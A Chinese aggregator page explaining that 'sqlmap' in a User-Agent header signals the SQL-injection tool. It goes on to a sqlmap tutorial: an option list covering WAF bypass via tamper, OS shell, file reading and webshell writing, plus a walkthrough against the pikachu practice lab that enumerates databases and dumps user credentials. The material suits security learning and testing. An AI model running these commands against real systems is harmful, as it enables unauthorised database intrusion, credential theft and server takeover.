user-agent里面的sqlmap是啥意思
Posted
tags:
篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了user-agent里面的sqlmap是啥意思相关的知识,希望对你有一定的参考价值。
参考技术A sqlmap是一款黑客的 注入工具。估计有人扫,或是 在进行安全检测。9sqlmap工具使用简介
一、sqlmap工具命令
-r 指定参数post注入 sqlmap.py -r post.txt -p 注入参数
-u get注入,后面直接接一个url连接
--level = LEVEL 执行测试的等级(1-5,默认为1),使用–level 参数且数值>=2的时候也会检查cookie里面的参数,当>=3的时候将检查User-agent和Referer。
--risk = RISK 执行测试的风险(0-3,默认为1),默认是1会测试大部分的测试语句,2会增加基于事件的测试语句,3会增加OR语句的SQL注入测试。
-v ERBOSE信息级别: 0-6 (缺省1),其值具体含义:“0”只显示python错误以及严重的信息;1同时显示基本信息和警告信息(默认);“2”同时显示debug信息;“3”同时显示注入的payload;“4”同时显示HTTP请求;“5”同时显示HTTP响应头;“6”同时显示HTTP响应页面;如果想看到sqlmap发送的测试payload最好的等级就是3。
-p -p 后面接参数,针对单个参数注入
-threads 线程数,如果你想让sqlmap跑的更快,可以更改这个线程 数的值,默认值为10
-batch-smart 智能判断测试
--mobile 模拟测试手机环境站点
-m 批量注入
注入获取命令: --dbs //默认情况系sqlmap会自动的探测web应用后端的数据库类型:MySQL、Oracle、PostgreSQL、MicrosoftSQL Server、Microsoft Access、SQLite、Firebird、Sybase、SAPMaxDB、DB2
--current-user:大多数数据库中可检测到数据库管理系统当前用户
--current-db:当前连接数据库名
--is-dba:判断当前的用户是否为管理
--users:列出数据库所有用户
获取表名 --tables -D 数据库名
字段名 --columns -T user -D abc
数据内容 -T user -C username,password,email --dump
读文件内容 --file-read /etc/password
系统交互的shell --os-shell
写webshell --file-write "c:/2.txt” --file-dest “C:/php/htdocs/sql.php” -v1 /将/software/nc.exe文件上传到C:/WINDOWS/Temp下/
sqlmap过waf --tamper ""
二、实验案例
实验环境使用 pikachu ,确定网站存在post漏洞,在网站上输入“1”,使用burp suite抓取数据包,把数据包放到D盘下,命名 1.txt。
1、查询可以利用的漏洞
sqlmap.py -r d:\\1.txt
红框中的内容为sqlmap从存储的会话中恢复的注入点,并分别描述了type(注入类型),title和payload。
2、获取数据库管理系统当前用户
sqlmap.py -r d:\\1.txt --current-user
3、获取当前连接数据库名
sqlmap.py -r d:\\1.txt --current-db
4、判断当前用户是否为管理员用户
sqlmap.py -r d:\\1.txt --is-dba
5、列出数据库所有用户
qlmap.py -r d:\\1.txt --users
6、获取表名
sqlmap.py -r d:\\1.txt --tables -D pikachu
7、获取字段名
sqlmap.py -r d:\\1.txt --columns -T users -D pikachu
八、获取数据内容
sqlmap.py -r d:\\1.txt --dump -T users -C username,password,id,level
以上是关于user-agent里面的sqlmap是啥意思的主要内容,如果未能解决你的问题,请参考以下文章
SQLmap参数设置之二——1.sqlmap设置user-agent;2.sqlmap设置host头;3.sqlmap设置referer头;4.sqlmap设置其他的HTTP头
SQLmap参数设置之二——1.sqlmap设置user-agent;2.sqlmap设置host头;3.sqlmap设置referer头;4.sqlmap设置其他的HTTP头